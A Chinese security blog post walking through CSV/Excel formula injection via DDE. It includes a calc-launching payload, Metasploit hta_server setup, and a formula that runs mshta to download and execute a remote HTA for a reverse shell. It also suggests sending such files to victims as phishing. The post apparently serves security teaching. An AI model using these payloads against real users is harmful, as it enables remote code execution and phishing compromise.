漏洞介绍
CSV公式注入(CSV Injection)是一种会造成巨大影响的攻击向量,攻击这可以向Excel文件中注入可以输出或以CSV文件读取的恶意攻击载荷,当用户打开Excel文件时,文件会从CSV描述转变为原始的Excel格式,包括Excel提供的所有动态功能,在这个过程中,CSV中的所有Excel公式都会执行,当该函数有合法意图时,很易被滥用并允许恶意代码执行。
漏洞复现
简易测试
在Office的"文件->选项->信任中心"处开启"启用动态数据交换服务器启动"功能:
之后构造以下恶意载荷:
=1+cmd|' /C calc'!A0
之后模拟用户打开Excel文件:
发现载荷成功执行:
反弹Shell
这里使用MSF框架来实施攻击:
use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.174.129
msf exploit(windows/misc/hta_server) > exploit
之后在Excel中插入恶意载荷
=1+cmd|' /C mshta.exe http://192.168.174.129:8888/Agd7QT.hta'!A0
保存之后发送给其他用户:
当用户打开时在MSF端成功上线:
文末小结
CSV注入时常出现在数据导出功能部分,例如:将当前表格数据导出到Excel,此时攻击者可以在当前表格中插入恶意代码,之后当用户导出当前表格数据并保存为Excel,再次打开Excel时便会导致恶意载荷执行,同时CSV注入也可以用于钓鱼,攻击者可以精心构造一个富含大量数据的Excel并插入恶意代码,诱导受害者用户访问并查看,从而触发恶意代码~
原文始发于微信公众号(七芒星实验室):CSV注入之RCE&社工钓鱼
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论